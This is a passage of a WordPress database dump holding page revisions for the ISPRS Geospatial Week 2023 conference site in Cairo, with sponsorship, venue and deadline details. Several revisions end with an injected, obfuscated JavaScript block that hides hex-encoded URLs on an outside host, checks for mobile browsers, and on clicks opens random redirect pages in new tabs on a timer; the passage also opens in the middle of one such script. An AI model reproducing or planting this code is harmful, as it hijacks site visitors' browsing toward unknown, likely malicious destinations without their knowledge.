_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-01-25 07:21:21','2023-01-25 07:21:21','',2685,'https://gsw2023.com/?p=3653',0,'revision','',0),
(3654,1,'2023-01-28 23:22:37','2023-01-28 23:22:37','','New SPONSORSHIP','','inherit','open','closed','','new-sponsorship','','','2023-01-28 23:22:37','2023-01-28 23:22:37','',2920,'https://gsw2023.com/wp-content/uploads/2023/01/New-SPONSORSHIP.jpg',0,'attachment','image/jpeg',0),
(3655,1,'2023-01-28 23:23:01','2023-01-28 23:23:01','<p>[vc_row][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><strong>ISPRS GEOSPATIAL WEEK 2023</strong></h3>\n<h3 style=\"text-align: center;\"><strong>SPONSORSHIP AND EXHIBITION - Cairo – Egypt 2-7 September 2023</strong></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>The Arab Academy for Science, Science, and Maritime Transport as the ISPRS GSW2023 organizer would like to invite you to participate as a sponsor / exhibitor at the Geospatial Week 2023, which will be held in Cairo, Egypt on 2-7 September 2023.</h5>\n<h5></h5>\n<h5>The Geospatial Week is an internationally renowned scientific event held once every two years. The event is organized by the International Society of Photogrammetry and Remote Sensing (ISPRS) to bring together expertise in the fields of photogrammetry, remote sensing, and geospatial information science. Some 1000 to 2000 researchers and professionals from around the world gathered for an entire week to share new findings and experiences through a series</h5>\n<h5>of dedicated workshops. More information regarding ISPRS can be found at:</h5>\n<h5><u><a href=\"https://www.isprs.org/\">-www.isprs.org.</a></u></h5>\n<h5></h5>\n<h5>-An exhibition will also be held during the conference. This provides companies in the field with the opportunity to be involved and showcase their products, services, and expertise to an international audience. As a professional, you also get the chance to attend the presentations and follow the latest scientific developments in the field. Conference attendees are free to wander around the exhibition area during the workshops, coffee and lunch breaks. Participants can register for any number of days.</h5>\n<h5></h5>\n<h5>-A number of sponsorship and exhibition packages are available. Tailor-made options are also available, interested companies to contact the GSW Director Prof. Naser El-Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> for more details on the sponsorship opportunities for the GSW/2023.</h5>\n<h5></h5>\n<h5>-We hope you will consider the opportunity to participate at the ISPRS Geospatial Week 2023 and look forward to meeting you in Cairo!</h5>\n<h5></h5>\n<h5>The GSW2023 Organizing Committee.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"chino\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h4><strong>SPONSORSHIP AND EXHIBITION PACKAGES</strong></h4>\n<p><strong>Sponsorship options include the opportunity to give oral presentations about your company’s products, exhibition booths, live demonstrations and the ability to give a half-day interactive tutorial of your software or product on Sunday. More information regarding the various packages and additional à la carte options is given below. If you would like to discuss other sponsorship options or tailor-made packages, please contact the GSW Director Prof. Naser El- Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> or <u><a href=\"mailto:info@gsw2023.com\">info@gsw2023.com</a></u> .</strong>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"3654\" img_size=\"1600x2000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner][vc_column_text]</p>\n<h5><strong>Venue - INTERCONTINENTAL  CAIRO SEMIRAMIS</strong></h5>\n<p>(<u>https:/<a href=\"http://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc\">/www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc</a>=nav_hotel</u> <u>detail_undefined</u>)</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>The GSW2023 will take place on the historic Semiramis hotel site, guests can enjoy modern luxury on the River Nile. This Cairo hotel features a rooftop pool, fine dining with exquisite cuisine for every taste, conference facilities, a state-of-the-art Spa, a shopping arcade, with the Nile Terrace offering stunning views of the sunset over the Nile. Located at a premium location in the heart of the city center, the hotel offers complimentary WIFI and is located next to the Egyptian Museum and bazaars of old Cairo.</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2936\" img_size=\"1000x500\" alignment=\"center\" onclick=\"zoom\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>SPONSORSHIP TIMETABLE AND DEADLINES</h5>\n<p><strong>Upon registration, the sponsor’s logo and level of support will be published on the GSW2023 website.</strong></p>\n<p>&nbsp;</p>\n<ul>\n<li><strong>March 1, 2023 Deadline for sponsorship confirmation and payment</strong></li>\n<li><strong>June 1, 2013 Delivery of sponsorship material to be included in conference bags to:</strong></li>\n</ul>\n<p>&nbsp;</p>\n<h5>The Arab Academy for Science, Science, and Maritime Transport</h5>\n<h6><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h6>\n<h5></h5>\n<h5><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5><strong>Tel :(+203) 5497598</strong></h5>\n<h5><b>Fax:(+203) <strong>5497598</strong></b></h5>\n<p>&nbsp;</p>\n<p><strong>Main Campus</strong></p>\n<p><strong> Alexandria, </strong><strong>Miami </strong><strong>Campus</strong></p>\n<p><strong>P.O. Box 1029 -Gamal Abdelnaser st. </strong><strong>-Miami </strong></p>\n<p><strong>Tel :(+203) 5565429/ 5506042</strong></p>\n<p><b>Fax:(+203) 5487786/ 5506042  </b></p>\n<p>&nbsp;</p>\n<p><strong>Alexandria, </strong><strong>Abu kir Campus</strong></p>\n<p><strong>Tel :(+203) 5622366/ 5622388</strong></p>\n<p><b>Fax:(+203) 5610950</b>[/vc_column_text][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][ultimate_info_table design_style=\"design04\" color_scheme=\"blue\" package_heading=\"CONFERENCE PROGRAM FOR EXHIBITORS\"]</p>\n<table>\n<tbody>\n<tr>\n<td width=\"170\">\n<h5><strong>September 2</strong></h5>\n</td>\n<td width=\"189\">\n<h5><strong>9:00 – 5:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5><strong>Tutorial Day</strong></h5>\n<h5><strong>Exhibition Setup</strong></h5>\n</td>\n</tr>\n<tr>\n<td width=\"170\">\n<h5><strong>September 3</strong></h5>\n</td>\n<td width=\"189\">\n<h5></h5>\n<h5><strong>12:00-17:00</strong></h5>\n<h5><strong>18:00 – 20:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5></h5>\n<h5><strong>Exhibition Opening</strong></h5>\n<h5><strong>Welcome Reception</strong></h5>\n</td>\n</tr>\n<tr>\n<td width=\"170\">\n<h5><strong>September 4</strong></h5>\n</td>\n<td width=\"189\">\n<h5></h5>\n<h5><strong>9:00 – 17:00</strong></h5>\n<h5><strong>18:00 – 20:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5></h5>\n<h5><strong>Exhibition</strong></h5>\n<h5><strong>Exhibitors’ reception</strong></h5>\n</td>\n</tr>\n<tr>\n<td width=\"170\">\n<h5><strong>September 5</strong></h5>\n</td>\n<td width=\"189\">\n<h5></h5>\n<h5><strong>9:00 – 15:00</strong></h5>\n<h5><strong>15:00 – 18:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5></h5>\n<h5><strong>Exhibition</strong></h5>\n<h5><strong>Dismantle Exhibition</strong></h5>\n</td>\n</tr>\n</tbody>\n</table>\n<p>[/ultimate_info_table][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>The Organizing Committee reserves the right to change these times to better fit the final program if necessary. Allocation of the booths will be on a first-come-first-served basis upon receiving the confirmation and payment, with preference given to the companies who request multiple booths</strong></h5>\n<p>&nbsp;</p>\n<h5><strong>INFORMATION</strong></h5>\n<p><strong>For more information visit the Geospatial Week 2023 website: www.gsw2023.com or contact<a href=\"mailto:elsheimy@ucalgary.ca\"> the organizing committee by mail (elsheimy@ucalgary.ca</a> or <u><a href=\"mailto:info@gsw2023.com\">info@gsw2023.com</a></u></strong> ).[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SPONSORSHIP AND EXHIBITION','','inherit','closed','closed','','2920-revision-v1','','','2023-01-28 23:23:01','2023-01-28 23:23:01','',2920,'https://gsw2023.com/?p=3655',0,'revision','',0),
(3656,1,'2023-01-28 23:25:35','2023-01-28 23:25:35','<p>[vc_row][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><strong>ISPRS GEOSPATIAL WEEK 2023</strong></h3>\n<h3 style=\"text-align: center;\"><strong>SPONSORSHIP AND EXHIBITION - Cairo – Egypt 2-7 September 2023</strong></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>The Arab Academy for Science, Science, and Maritime Transport as the ISPRS GSW2023 organizer would like to invite you to participate as a sponsor / exhibitor at the Geospatial Week 2023, which will be held in Cairo, Egypt on 2-7 September 2023.</h5>\n<h5></h5>\n<h5>The Geospatial Week is an internationally renowned scientific event held once every two years. The event is organized by the International Society of Photogrammetry and Remote Sensing (ISPRS) to bring together expertise in the fields of photogrammetry, remote sensing, and geospatial information science. Some 1000 to 2000 researchers and professionals from around the world gathered for an entire week to share new findings and experiences through a series</h5>\n<h5>of dedicated workshops. More information regarding ISPRS can be found at:</h5>\n<h5><u><a href=\"https://www.isprs.org/\">-www.isprs.org.</a></u></h5>\n<h5></h5>\n<h5>-An exhibition will also be held during the conference. This provides companies in the field with the opportunity to be involved and showcase their products, services, and expertise to an international audience. As a professional, you also get the chance to attend the presentations and follow the latest scientific developments in the field. Conference attendees are free to wander around the exhibition area during the workshops, coffee and lunch breaks. Participants can register for any number of days.</h5>\n<h5></h5>\n<h5>-A number of sponsorship and exhibition packages are available. Tailor-made options are also available, interested companies to contact the GSW Director Prof. Naser El-Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> for more details on the sponsorship opportunities for the GSW/2023.</h5>\n<h5></h5>\n<h5>-We hope you will consider the opportunity to participate at the ISPRS Geospatial Week 2023 and look forward to meeting you in Cairo!</h5>\n<h5></h5>\n<h5>The GSW2023 Organizing Committee.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"chino\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h4><strong>SPONSORSHIP AND EXHIBITION PACKAGES</strong></h4>\n<p><strong>Sponsorship options include the opportunity to give oral presentations about your company’s products, exhibition booths, live demonstrations and the ability to give a half-day interactive tutorial of your software or product on Sunday. More information regarding the various packages and additional à la carte options is given below. If you would like to discuss other sponsorship options or tailor-made packages, please contact the GSW Director Prof. Naser El- Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> or <u><a href=\"mailto:info@gsw2023.com\">info@gsw2023.com</a></u> .</strong>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"3654\" img_size=\"1600x2000\"][vc_column_text]</p>\n<h5><strong>Please note that there is a 10% discount for ISPRS Sustaining Members.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner][vc_column_text]</p>\n<h5><strong>Venue - INTERCONTINENTAL  CAIRO SEMIRAMIS</strong></h5>\n<p>(<u>https:/<a href=\"http://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc\">/www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc</a>=nav_hotel</u> <u>detail_undefined</u>)</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>The GSW2023 will take place on the historic Semiramis hotel site, guests can enjoy modern luxury on the River Nile. This Cairo hotel features a rooftop pool, fine dining with exquisite cuisine for every taste, conference facilities, a state-of-the-art Spa, a shopping arcade, with the Nile Terrace offering stunning views of the sunset over the Nile. Located at a premium location in the heart of the city center, the hotel offers complimentary WIFI and is located next to the Egyptian Museum and bazaars of old Cairo.</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2936\" img_size=\"1000x500\" alignment=\"center\" onclick=\"zoom\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>SPONSORSHIP TIMETABLE AND DEADLINES</h5>\n<p><strong>Upon registration, the sponsor’s logo and level of support will be published on the GSW2023 website.</strong></p>\n<p>&nbsp;</p>\n<ul>\n<li><strong>March 1, 2023 Deadline for sponsorship confirmation and payment</strong></li>\n<li><strong>June 1, 2013 Delivery of sponsorship material to be included in conference bags to:</strong></li>\n</ul>\n<p>&nbsp;</p>\n<h5>The Arab Academy for Science, Science, and Maritime Transport</h5>\n<h6><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h6>\n<h5></h5>\n<h5><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5><strong>Tel :(+203) 5497598</strong></h5>\n<h5><b>Fax:(+203) <strong>5497598</strong></b></h5>\n<p>&nbsp;</p>\n<p><strong>Main Campus</strong></p>\n<p><strong> 